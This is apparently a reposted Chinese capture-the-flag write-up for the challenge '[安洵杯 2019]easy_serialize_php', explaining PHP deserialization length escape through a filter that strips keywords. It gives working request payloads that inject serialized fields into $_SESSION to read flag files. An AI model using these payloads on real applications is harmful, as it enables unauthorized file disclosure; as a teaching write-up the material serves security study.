zoukankan      html  css  js  c++  java
  • [安洵杯 2019]easy_serialize_php

    0x00 知识点

    PHP反序列化的对象逃逸

    任何具有一定结构的数据,只要经过了某些处理而把自身结构改变,则可能会产生漏洞。
    参考链接:
    https://blog.csdn.net/a3320315/article/details/104118688/
    过滤函数分为两种情况
    第一种为关键词数增加

    例如: where->hacker,这样词数由五个增加到6个。
    第二种为关键词数减少
    例如:直接过滤掉一些关键词,例如这道题目中。

    过滤函数filter()是对serialize($_SESSION)进行过滤,滤掉一些关键字
    那么我们有两种方法:
    键逃逸和值逃逸

    值逃逸:
    这儿需要两个连续的键值对,由第一个的值覆盖第二个的键,这样第二个值就逃逸出去,单独作为一个键值对

    _SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}&function=show_image
    

    var_dump的结果为:

    "a:3{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}"
    

    键逃逸:

    这儿只需要一个键值对就行了,我们直接构造会被过滤的键,这样值得一部分充当键,剩下得一部分作为单独得键值对

    _SESSION[flagphp]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
    

    var_dump的结果为:

    "a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mbGxsbGxsYWc=";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}"
    

    这儿得s:7:""之所以为空,是因为我们构造得键flagphp都是会被过滤得,所以显示为空,这样就能吃掉一部分值了,然后将剩下得值充当另一个对象逃逸出去~~

    0x01 解题

    回到题目,我们首先看源码

    过滤函数filter()是对serialize($_SESSION)进行过滤,滤掉一些关键字
    正常传img参数进去会被sha1加密,我们应该用别的方法控制$_SESSION中的参数。
    本来挺好的序列化的字符串,按某种去掉了一些关键字,本身就不对,本身就涉及到可能破坏原有结构而无法正常反序列化的问题。这里是利用反序列化长度逃逸控制了img参数。之前有一道题目是关键字替换导致字符串长度变长,把后面的原有参数挤出去了,
    本题是关键字被置空导致长度变短,后面的值的单引号闭合了前面的值的单引号,导致一些内容逃逸。。
    
    extract后覆盖了两个没用的属性,但是后面又强制加了一个我们不可控的img属性
    

    根据源码,我们先对f传参phpinfo

    构造payload来对
    d0g3_f1ag.php读取。

    ;s:14:"phpflagphpflag";s:7:"xxxxxxx";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
    

    解释一下:
    这里首先phpflagphpflag会被过滤为空,吃掉一部分值

    $serialize_info的内容为

    a:2:{s:7:"";s:48:";s:7:"xxxxxxx";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";
    
    

    刚好把后面多余的img部分截断掉

    payload:

    _SESSION[phpflag]=;s:7:"xxxxxxx";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
    

    读取/d0g3_fllllllag
    payload:

    _SESSION[phpflag]=;s:14:"phpflagphpflag";s:7:"xxxxxxx";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
    

    参考链接:

    https://www.jianshu.com/p/1f44650b0822
    https://blog.csdn.net/a3320315/article/details/104118688/

  • 相关阅读:
    2-2. 线性池技术优化
    2-1. 基于OpenSSL的传输子系统实现
    1-4. 嵌入式web服务器BOA的移植及应用
    1-3. Linux下移动图像监测系统——motion的移植及应用
    1-2. 摄像头驱动的使能配置、V4L2编程接口的设计应用
    1-1. OSS/ALSA 声卡的驱动与配置和 Madplay 嵌入式播放器的移植
    嵌入式Linux开发环境搭建,问题ping、nfs的解决
    并发服务器的设计
    WPF 子类访问主类(父类)MainWindow的属性和方法
    stm32 读取多路SDADC
  • 原文地址:https://www.cnblogs.com/wangtanzhi/p/12261610.html
Copyright © 2011-2022 走看看